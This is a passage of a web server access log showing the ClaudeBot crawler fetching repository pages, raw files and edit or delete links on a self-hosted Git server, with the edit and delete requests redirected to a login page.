+claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 216.73.216.188] [Length 34394] [Gzip 9.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 11402] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 216.73.216.188] [Length 11022] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 216.73.216.188] [Length 12584] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 17039] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 14508] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 216.73.216.188] [Length 11229] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Ffetcher.py.good" [Client 216.73.216.188] [Length 23683] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11073] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11221] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 17046] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 216.73.216.188] [Length 14906] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" [Client 216.73.216.188] [Length 82541] [Gzip 10.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11075] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 216.73.216.188] [Length 11360] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11064] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11301] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 21549] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11068] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" -[15/Feb/2026:12:13:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" -[15/Feb/2026:12:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" -[15/Feb/2026:12:13:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11557] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 23721] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38748] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fapp.js.good" [Client 216.73.216.188] [Length 29139] [Gzip 8.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 60520] [Gzip 8.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fapp.js.good2" [Client 216.73.216.188] [Length 30860] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fmain.py.good" [Client 216.73.216.188] [Length 28746] [Gzip 7.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 216.73.216.188] [Length 11962] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fmain.py.good2" [Client 216.73.216.188] [Length 28680] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Findex.html.good2" [Client 216.73.216.188] [Length 22136] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" -[15/Feb/2026:12:13:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 31289] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fapp.js" [Client 216.73.216.188] [Length 34503] [Gzip 8.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET 